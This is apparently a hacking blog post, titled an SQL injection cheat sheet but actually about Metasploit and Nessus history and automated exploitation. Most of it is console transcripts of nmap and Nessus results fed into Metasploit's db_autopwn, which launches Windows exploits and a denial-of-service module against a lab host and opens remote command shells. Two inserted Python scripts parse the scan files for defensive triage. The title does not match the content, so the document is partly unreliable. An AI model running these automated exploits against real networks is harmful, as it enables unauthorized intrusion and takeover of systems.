SQL Injection Cheat Sheet | Auto Pwn | Metasploit

This is part three of a series on the different methods by which one can break into a system and take it over. This SQL Injection Cheat Sheet covers penetration-testing software such as Metasploit and Nessus, which are used to find weaknesses in a system. It will also guide readers on how to auto pwn (exploit/hack/flood) a target into submission.


A Little History Lesson

[Photo: H. D. Moore]
HD Moore created Metasploit, one of the most influential hacking tools, at age 22.

In 2003, H.D. Moore created Metasploit (also known as the Metasploit Project), a computer-security project. Metasploit collects data about new cyber threats and system vulnerabilities and then provides private and government entities with that information.

It also conducts IDS signature development and penetration testing.

Another similar piece of software is Nessus, created by Tenable Network Security, which has been around a few years longer than Metasploit.

According to surveys published by sectools.org in 2009, Nessus ranked first as the world's most used vulnerability scanner in 2000, 2003 (the year Metasploit first appeared on the scene), and 2006.

In 2005, over 75,000 organizations throughout the world were using Nessus, according to a study done by Tenable Network Security. One of the awesome things about Nessus is that it is free for personal, non-commercial use.

The Nessus Project was created by Renaud Deraison in 1998. Deraison's goal was to provide a free remote security scanner for the Internet community. In October 2005, Tenable Network Security released Nessus 3 under a closed-source license. Nevertheless, it is still free for non-institutional use.


SQL Injection Cheat Sheet


[0x03] – Metasploit Ninja – Auto Pwned

Metasploit is a tool for exploiting system vulnerabilities. Nevertheless, the penetration tester needs to find those vulnerabilities first, which is one of the drawbacks of Metasploit. However, the latest version of Metasploit adds a feature called db_autopwn ("autopwn") which automatically launches the exploits that match the open ports reported by nmap or the vulnerabilities reported by Nessus.

Note: Metasploit's automated autopwn feature can cover whole networks: it scans them with nmap and then runs the matching exploits automatically.


[0x03a] – Nmap + Metasploit Autopwned

bt ~ # nmap -sS 192.168.80.129 -oX nmap.xml
Starting Nmap 4.85BETA10 ( http://nmap.org )
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1027/tcp open  IIS
1433/tcp open  ms-sql-s
3372/tcp open  msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds

Now there is an nmap.xml file that can be imported into the Metasploit framework.
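What db_import_nmap_xml pulls out of that file is easy to see by parsing it yourself. The following Python script is an added example, not code from the original post or from Metasploit: it reads a constructed nmap -oX document that mirrors the scan above (the XML layout is nmap's standard one; the extra filtered 8080/tcp entry and the allow-list of expected ports are assumptions for illustration), lists the open ports per host, which is what the port-based autopwn matching works from, and flags the open ports a defender would not expect to be reachable from the scanning host.

```python
import xml.etree.ElementTree as ET

# Constructed sample: a minimal nmap -oX document reproducing the scan of
# 192.168.80.129 shown above. It is not the page's actual nmap.xml; the
# filtered 8080/tcp entry is added to show that non-open ports are kept apart.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS 192.168.80.129 -oX nmap.xml" version="4.85BETA10">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.80.129" addrtype="ipv4"/>
    <address addr="00:0C:29:CC:CF:46" addrtype="mac" vendor="VMware"/>
    <ports>
      <extraports state="closed" count="990"/>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="https"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="1025"><state state="open"/><service name="NFS-or-IIS"/></port>
      <port protocol="tcp" portid="1026"><state state="open"/><service name="LSA-or-nterm"/></port>
      <port protocol="tcp" portid="1027"><state state="open"/><service name="IIS"/></port>
      <port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s"/></port>
      <port protocol="tcp" portid="3372"><state state="open"/><service name="msdtc"/></port>
      <port protocol="tcp" portid="8080"><state state="filtered"/><service name="http-proxy"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one record per <port> element: host, protocol, port, state, service."""
    root = ET.fromstring(xml_text)
    records = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # nmap also lists hosts that were down; skip them
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for port in host.findall("ports/port"):
            state = port.find("state")
            service = port.find("service")
            records.append({
                "host": addr.get("addr"),
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "state": state.get("state") if state is not None else "unknown",
                "service": service.get("name") if service is not None else "",
            })
    return records


def open_ports(records):
    """Map host -> sorted list of open ports; closed/filtered entries are dropped."""
    result = {}
    for r in records:
        if r["state"] == "open":
            result.setdefault(r["host"], []).append(r["port"])
    return {h: sorted(p) for h, p in result.items()}


def unexpected_exposure(records, allowed):
    """Defender's check: open ports that are not on the allow-list of expected services."""
    return sorted((r["host"], r["port"], r["service"]) for r in records
                  if r["state"] == "open" and r["port"] not in allowed)


if __name__ == "__main__":
    recs = parse_nmap_xml(SAMPLE_NMAP_XML)
    print(open_ports(recs))
    # Assumed allow-list: only the web ports were meant to be reachable.
    for host, port, service in unexpected_exposure(recs, allowed={80, 443}):
        print(f"{host}: {port}/tcp ({service}) should not be exposed")
```

Run against a real nmap -oX file by replacing SAMPLE_NMAP_XML with the file's contents; the same records are what end up in the Metasploit database, so the allow-list comparison tells you in advance which ports the autopwn port matcher will have something to try against.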

[Import Nmap Result to Metasploit]

bt framework3 # msfconsole

[Metasploit ASCII-art banner]

=[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux
msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > db_create /tmp/test.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /tmp/test.db
msf > db_import_nmap_xml /root/nmap.xml
msf > db_hosts
[*] Time: Fri Jul 03 14:01:56 +0000 2009 Host: 192.168.80.129 Status: alive OS:
msf > db_autopwn -p -e
[*] (3/116): Launching exploit/unix/webapp/tikiwiki_jhot_exec against 192.168.80.129:80...
[*] (8/116): Launching exploit/unix/webapp/awstats_configdir_exec against 192.168.80.129:80...
[*] (9/116): Launching exploit/windows/http/bea_weblogic_transfer_encoding against 192.168.80.129:80...
[*] Started bind handler
[*] Started bind handler
[*] (12/116): Launching exploit/unix/webapp/awstats_migrate_exec against 192.168.80.129:80...
[*] (13/116): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] Started bind handler
[*] Started bind handler
[*] Job limit reached, waiting on modules to finish...
[*] The server returned: 404 Object Not Found
[*] This server may not be vulnerable
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] ...
[*] The server returned: 404 Object Not Found
[*] This server may not be vulnerable
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.80.131:52929 -> 192.168.80.129:10529)
.......
.......
msf > sessions -l
Active sessions
===============
Id Description   Tunnel
-- -----------   ------
1  Command shell 192.168.80.131:52929 -> 192.168.80.129:10529
2  Command shell 192.168.80.131:50775 -> 192.168.80.129:17887
3  Command shell 192.168.80.131:40985 -> 192.168.80.129:37295
4  Command shell 192.168.80.131:51652 -> 192.168.80.129:37095
5  Command shell 192.168.80.131:38373 -> 192.168.80.129:17130
6  Command shell 192.168.80.131:56722 -> 192.168.80.129:20693
msf > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2
C:\WINNT\system32>

[0x03b] – Nessus + Metasploit Auto Pwned

First, run a vulnerability assessment (VA) with the Nessus scanner and export the results as a *.nbe file, then import that file into the Metasploit framework for the auto pwn operation.
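The .nbe export that db_import_nessus_nbe reads is a plain pipe-delimited text format, so a defender can triage it without Metasploit at all. The Python script below is an added example, not code from the original post, from Nessus or from Metasploit: it parses a constructed .nbe excerpt (the record layout assumed here is results|subnet|host|service|plugin_id|severity|description, with "\n" escapes inside the description; the plugin IDs and finding texts are placeholders, not real Nessus plugins), summarises findings per host by severity, and lists the services carrying a "Security Hole", which are the findings that vulnerability-based autopwn matching would try to pair with an exploit module, and therefore the ones to patch first.

```python
import re
from collections import Counter

# Constructed sample .nbe content modelled on the scan of 192.168.80.129 above.
# It is not the page's demo.nbe; plugin IDs 10001-10005 and the descriptions
# are illustrative placeholders. Assumed record layout:
#   results|subnet|host|service|plugin_id|severity|description
SAMPLE_NBE = """timestamps|||scan_start|Fri Jul  3 14:30:01 2009|
timestamps||192.168.80.129|host_start|Fri Jul  3 14:30:02 2009|
results|192.168.80|192.168.80.129|epmap (135/tcp)|10001|Security Hole|Synopsis :\\n\\nArbitrary code can be executed on the remote host via the RPC interface (constructed finding).\\n
results|192.168.80|192.168.80.129|microsoft-ds (445/tcp)|10002|Security Hole|Synopsis :\\n\\nArbitrary code can be executed on the remote host via SMB (constructed finding).\\n
results|192.168.80|192.168.80.129|ms-sql-s (1433/tcp)|10003|Security Warning|The remote MS SQL service is reachable from the scanner (constructed finding).\\n
results|192.168.80|192.168.80.129|http (80/tcp)|10004|Security Note|A web server is running on this port (constructed finding).\\n
results|192.168.80|192.168.80.129|general/tcp|10005|Log Message|Scan information (constructed finding).\\n
timestamps||192.168.80.129|host_end|Fri Jul  3 14:43:50 2009|
timestamps|||scan_end|Fri Jul  3 14:43:55 2009|
"""

# "microsoft-ds (445/tcp)" -> name, port, protocol
SERVICE_RE = re.compile(r"^(?P<name>[^\s(]+)?\s*\((?P<port>\d+)/(?P<proto>tcp|udp)\)$")


def parse_service(field):
    """Split an NBE service field into (name, port, proto); port is None for 'general/tcp'."""
    m = SERVICE_RE.match(field)
    if m:
        return (m.group("name") or "", int(m.group("port")), m.group("proto"))
    if field.startswith("general/"):
        return ("general", None, field.split("/", 1)[1])
    return (field, None, None)


def parse_nbe(text):
    """Return one dict per 'results' record; timestamp and other record types are skipped."""
    findings = []
    for line in text.splitlines():
        parts = line.split("|", 6)  # the description is the last field and may contain '|'
        if len(parts) != 7 or parts[0] != "results":
            continue
        _, subnet, host, service, plugin_id, severity, description = parts
        name, port, proto = parse_service(service)
        findings.append({
            "host": host, "service": name, "port": port, "proto": proto,
            "plugin_id": int(plugin_id), "severity": severity,
            "description": description.replace("\\n", "\n").strip(),
        })
    return findings


def severity_summary(findings):
    """host -> Counter of severity labels: the first triage view of a scan."""
    summary = {}
    for f in findings:
        summary.setdefault(f["host"], Counter())[f["severity"]] += 1
    return summary


def exploitable_services(findings):
    """(host, port, proto) of every 'Security Hole' finding: patch these first."""
    return sorted({(f["host"], f["port"], f["proto"]) for f in findings
                   if f["severity"] == "Security Hole" and f["port"] is not None})


if __name__ == "__main__":
    found = parse_nbe(SAMPLE_NBE)
    for host, counts in severity_summary(found).items():
        print(host, dict(counts))
    for host, port, proto in exploitable_services(found):
        print(f"Security Hole on {host} {port}/{proto}")
```

Pointing parse_nbe at a real export gives the same per-host picture that db_hosts and db_autopwn -t produce inside msfconsole, and the "Security Hole" list is the subset worth checking against the vendor bulletins before anyone else gets to run the matching step.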

[Import Nessus(nbe) Result to Metasploit]

bt framework3 # msfconsole

[Metasploit ASCII-art banner]

=[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux
msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > db_create /tmp/ness.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /tmp/ness.db
msf > db_import_nessus_nbe /root/demo.nbe
msf > db_hosts
[*] Time: Fri Jul 03 14:43:58 +0000 2009 Host: 192.168.80.129 Status: alive OS:
msf > db_autopwn -x -t
[*] Analysis completed in 4.28915095329285 seconds (17 vulns / 1145 refs)
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.80.129:445...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445...
[*] Matched exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445...
msf > db_autopwn -x -e
[*] (2/6): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] (3/6): Launching exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445...
[*] Started bind handler
[*] (4/6): Launching exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434...
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] ...
[*] (5/6): Launching exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:[email protected]_ip_tcp:192.168.80.129[135] ...
[*] Started bind handler
[*] (6/6): Launching exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445...
[*] Sending UDP packet with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Started bind handler
[*] Connecting to the SMB service...
[*] Sending exploit ...
msf >
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[email protected]_np:192.168.80.129[BROWSER] ...
[*] Started bind handler
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:[email protected]_np:192.168.80.129[browser] ...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.80.131:41655 -> 192.168.80.129:39354)
[*] Command shell session 2 opened (192.168.80.131:57118 -> 192.168.80.129:7605)
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:[email protected]_np:192.168.80.129[lsarpc]...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:[email protected]_np:192.168.80.129[BROWSER] ...
[*] Building the stub data...
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:[email protected]_np:192.168.80.129[browser] ...
[*] Calling the vulnerable function...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:[email protected]_np:192.168.80.129[lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.0
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 3 opened (192.168.80.131:50407 -> 192.168.80.129:15299)
[*] Command shell session 4 opened (192.168.80.131:32768 -> 192.168.80.129:30092)
[*] The DCERPC service did not reply to our request
[*] Command shell session 5 opened (192.168.80.131:39556 -> 192.168.80.129:17330)
msf > sessions -l
Active sessions
===============
Id Description   Tunnel
-- -----------   ------
1  Command shell 192.168.80.131:41655 -> 192.168.80.129:39354
2  Command shell 192.168.80.131:57118 -> 192.168.80.129:7605
3  Command shell 192.168.80.131:50407 -> 192.168.80.129:15299
4  Command shell 192.168.80.131:32768 -> 192.168.80.129:30092
5  Command shell 192.168.80.131:39556 -> 192.168.80.129:17330
msf > sessions -i 3
[*] Starting interaction with 3...
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>ipconfig
ipconfig
Windows 2000 IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2
C:\WINNT\system32>
